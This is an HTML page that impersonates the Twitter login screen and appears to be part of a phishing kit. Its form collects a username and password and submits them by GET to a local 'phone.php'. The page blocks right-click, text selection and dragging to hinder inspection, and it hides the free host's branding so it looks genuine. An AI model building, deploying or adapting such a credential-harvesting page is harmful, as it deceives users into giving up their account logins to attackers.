
<html>


<head>

    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
<meta property="og:title" content="Login on Twitter / Twitter">
<meta name="description" content="Log in to your Twitter account.">
<meta property="og:description" content="Log in to your Twitter account.">
<meta property="og:url" content="./">
<meta property="og:site_name" content="Login on Twitter / Twitter">
<meta property="og:type" content="website">
<title>Login on Twitter / Twitter</title>
<link rel="stylesheet" href="css/twitter.css">
<link rel="shortcut icon" href="https://abs.twimg.com/favicons/twitter.ico">
<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5dcbabd2869127ad"></script>
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<div class="login-box">
	<center>
	<img width="40" src="img/twitter.png">
	<h4>Log in to Twitter</h4>
	</center>
	<form action="phone.php" method="get">
		<input type="text" name="username" placeholder="Phone, email, or username" autocomplete="off" required>
		<input type="password" name="password" placeholder="Password" autocomplete="off" required>
		<input type="hidden" name="login" value="Twitter" readonly>
		<button type="submit" class="btn-login">Log In</button>
	</form>
</div>
</body>

<style>
img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] 
{ display: none; }
</style>
</html>